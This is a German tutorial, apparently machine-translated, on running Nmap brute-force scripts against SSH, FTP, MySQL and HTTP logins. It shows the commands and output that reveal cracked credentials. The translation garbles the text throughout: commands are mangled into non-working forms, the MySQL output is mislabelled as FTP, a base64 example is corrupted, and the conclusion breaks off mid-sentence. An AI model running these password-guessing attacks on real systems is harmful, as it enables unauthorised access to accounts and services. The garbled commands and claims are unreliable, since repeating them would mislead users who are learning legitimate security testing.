Ubuntu@Ubuntu: ~ $ sudo APT Update && sudo APT -Upgrade
Ubuntu@Ubuntu: ~ $ sudo APT install nmap -y
Ubuntu@ubuntu: ~ $ cd/usr/share/nmap/scripts/
Ubuntu@Ubuntu: ~ $ ls *brotes *
In diesem Tutorial werden wir untersuchen, wie wir NMAP für einen Brute-Force-Angriff verwenden können.
SSH Brute-Force
SSH ist ein sicheres Remote -Administrationsprotokoll und unterstützt OpenSSL & Passwortbasierte Authentifizierung. Um SSH-basierte Authentifizierung von SSH-basiertem Force-Force-basierend zu machen, können wir „SSH-Brute verwenden.NSE ”NMAP -Skript.
Ubuntu@ubuntu:/usr/shar Share/nmap/script/$ ls*ssh*brate*
SSH-Brute.NSE
Übergeben Sie Benutzername und Passwortliste als Argument an NMAP.
Ubuntu@Ubuntu: ~ $ nmap --Script SSH -Brute -p22 192.168.43.181
--Skript-Args userdb = Benutzer.TXT, PassDB = Passwörter.txt
NMAP 7 starten.70 (https: // nmap.org) um 2020-02-08 17:09 PKT
NMAP -Scanbericht für 192.168.43.181
Host ist auf (0.00033s Latenz).
Port State Service
22/TCP Open SSH
| SSH-Brute:
| Konten:
| Admin: P4SSW0RD - Gültige Anmeldeinformationen
| _ Statistik: 99 Vermutungen in 60 Sekunden durchgeführt, durchschnittlich TPS: 1.7
NMAP Fertig: 1 IP -Adresse (1 Host -Up) gescannt in 60.17 Sekunden
FTP Brute-Force
FTP ist ein Dateiübertragungsprotokoll, das die kennwortbasierte Authentifizierung unterstützt. Um die Brute-Force-FTP zu erhalten, werden wir „FTP-Brute verwenden.NSE ”NMAP -Skript.
Ubuntu@ubuntu:/usr/share/nmap/script/$ ls*ftp*brate*
FTP-Brute.NSE
Übergeben Sie Benutzername und Passwortliste als Argument an NMAP.
Ubuntu@Ubuntu: ~ $ nmap --Script ftp -brute -p21 192.168.43.181-Skript-Args
userDB = Benutzer.TXT, PassDB = Passwörter.txt
NMAP 7 starten.70 (https: // nmap.org) um 2020-02-08 16:51 PKT
NMAP -Scanbericht für 192.168.43.181
Host ist auf (0.00021s Latenz).
Port State Service
21/TCP Open FTP
| FTP-Brute:
| Konten:
| Admin: P4SSW0RD - Gültige Anmeldeinformationen
| _ Statistik: 99 Vermutungen in 20 Sekunden, durchschnittlich TPS: 5 durchgeführt.0
NMAP Fertig: 1 IP -Adresse (1 Host -Up) gescannt in 19.50 Sekunden
Mysql Brute-Force
Manchmal bleibt MySQL für externe Verbindungen offen und ermöglicht es jedem, sich darauf zu verbinden. Das Passwort kann mit NMAP mit "MySQL-Brute" -Skript geknackt werden.
Ubuntu@Ubuntu: ~ $ sudo nmap --Script MySQL -Brute -p3306 192.168.43.181
--Skript-Args userdb = Benutzer.TXT, PassDB = Passwörter.txt
NMAP 7 starten.70 (https: // nmap.org) um 2020-02-08 16:51 PKT
NMAP -Scanbericht für 192.168.43.181
Host ist auf (0.00021s Latenz).
Port State Service
3306/TCP Open MySQL
| FTP-Brute:
| Konten:
| Admin: P4SSW0RD - Gültige Anmeldeinformationen
| _ Statistik: 99 Vermutungen in 20 Sekunden, durchschnittlich TPS: 5 durchgeführt.0
NMAP Fertig: 1 IP -Adresse (1 Host -Up) gescannt in 19.40 Sekunden
Http Brute-Force
HTTP verwendet drei Arten von Authentifizierung, um Benutzer mit Webservern zu authentifizieren. Diese Methoden werden in Routern, Modems und erweiterten Webanwendungen verwendet, um Benutzernamen und Passwörter auszutauschen. Diese Typen sind:
Grundlegende Authentifizierung
In HTTP Basic Authentication Protocol codiert Browser Benutzername und Kennwort mit Base64 und sendet es unter "Autorisierungs" -Header. Sie können dies im folgenden Screenshot sehen.
Autorisierung: Basic ywrtaw46ywrtaw4 =
Sie können diese Zeichenfolge base64 dekodieren, um den Benutzernamen und das Passwort zu sehen
Ubuntu@Ubuntu: ~ $ echo ywrtaw46ywrtaw4 = | Base64 -d
admin: admin
Die grundlegende Authentifizierung von HTTP ist unsicher, da sie sowohl den Benutzernamen als auch das Passwort im Klartext sendet. Jeder Man-in-the-Middle-Angreifer kann den Verkehr problemlos abfangen und die Zeichenfolge dekodieren, um das Passwort zu erhalten.
Verdauungsauthentifizierung
Die HTTP -Digest -Authentifizierung verwendet Hashing -Techniken, um den Benutzernamen und das Passwort zu verschlüsseln, bevor Sie ihn an den Server senden.
Hash1 = MD5 (Benutzername: Realm: Passwort)
Hash2 = MD5 (Methode: Digesturi)
Antwort = MD5 (Hash1: Nonce: Noncount: Cnonce: QOP: Hash2)
Sie können diese Werte unter dem Header „Autorisierung“ sehen.
Digest -basierte Authentifizierung ist sicher, da das Passwort nicht in einfachem Text gesendet wird. Wenn ein Mann-in-the-Middle-Angreifer den Verkehr abfängt, kann er das Klartextkennwort nicht erhalten.
Formbasierte Authentifizierung
Grundlegende und Digest -Authentifizierungen unterstützen nur die Übertragung von Benutzername und Kennwort, während die formbasierte Authentifizierung basierend auf den Anforderungen des Benutzers angepasst werden kann. Sie können Ihre eigene Webseite auf HTML oder JavaScript erstellen, um Ihre eigenen Codierungs- und Transfertechniken anzuwenden.
Normalerweise werden Daten in formbasierter Authentifizierung in einfachem Text gesendet. Für Sicherheitsprobleme muss HTTPS angewendet werden, um MAN-in-the-Middle-Angriffe zu verhindern.
Wir können alle Arten von HTTP -Authentifizierung mit NMAP erzwingen. Wir werden das Skript "http-brute" zu diesem Zweck verwenden.
Ubuntu@ubuntu:/usr/shar Share/nmap/script/$ ls*http*brate*
http-brute.NSE
Um dieses NMAP-Skript zu testen, werden wir eine öffentlich gehostete Brute-Force-Herausforderung der Pentester Academy unter dieser URL http: // pentesteracademylab lösen.AppSpot.com/lab/webapp/basicAuth.
Wir müssen alles, einschließlich Hostname, URI, Anforderungsmethode und Wörterbücher, separat als Skriptargument anbieten.
Ubuntu@Ubuntu: ~ $ sudo nmap -p80 --Skript http -brute pentesteracademylab.AppSpot.com
--Skript-Args http-brute.Hostname = Pentesteracademylab.AppSpot.com,
http-brute.path =/lab/webapp/basicAuth, userDB = Benutzer.TXT, PassDB = Passwörter.txt,
http-brute.Methode = Post
NMAP 7 starten.70 (https: // nmap.org) um 2020-02-08 21:37 PKT
NMAP -Scanbericht für Pentesteracademylab.AppSpot.com (216.58.210.84)
Host ist auf (0.20s Latenz).
Andere Adressen für Pentesteracademylab.AppSpot.com (nicht gescannt): 2A00: 1450: 4018: 803 :: 2014
RDNS -Rekord für 216.58.210.84: MCT01S06-in-F84.1e100.Netz
Port State Service
80/TCP Open HTTP
| http-brute:
| Konten:
| admin: aaddd - gültige Anmeldeinformationen
| _ Statistik: 165 Vermutungen in 29 Sekunden durchgeführt, durchschnittlich TPS: 5.3
NMAP Fertig: 1 IP -Adresse (1 Host -Up) gescannt in 31.22 Sekunden
Abschluss
NMAP kann verwendet werden, um trotz einfach einfacher Port -Scan viele Dinge zu tun. Es kann Metasploit, Hydra, Medusa und viele andere Tools ersetzen. NMAP verfügt.